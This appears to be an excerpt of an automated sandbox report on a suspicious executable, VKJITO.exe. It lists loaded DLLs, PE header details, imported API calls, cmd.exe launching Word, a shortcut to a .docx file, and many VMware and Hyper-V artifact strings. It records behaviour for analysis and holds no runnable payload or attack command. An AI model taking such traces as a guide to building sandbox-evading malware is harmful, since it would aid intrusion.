        Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: ???????.LNK.6.drLNK file: ..\..\..\..\..\Desktop\.docx
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
        Source: VKJITO.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4321880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF7D4321880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_000001A673A102FA push eax; ret 0_2_000001A673A10364
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_000001A673A10128 push eax; ret 0_2_000001A673A10364
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4321880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF7D4321880
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
        Source: Amcache.hve.9.drBinary or memory string: VMware
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm
        Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: curl.exe, 00000001.00000003.2054053753.0000022B7B264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: Amcache.hve.9.drBinary or memory string: vmci.sys
        Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.9.drBinary or memory string: VMware20,1
        Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@K
        Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
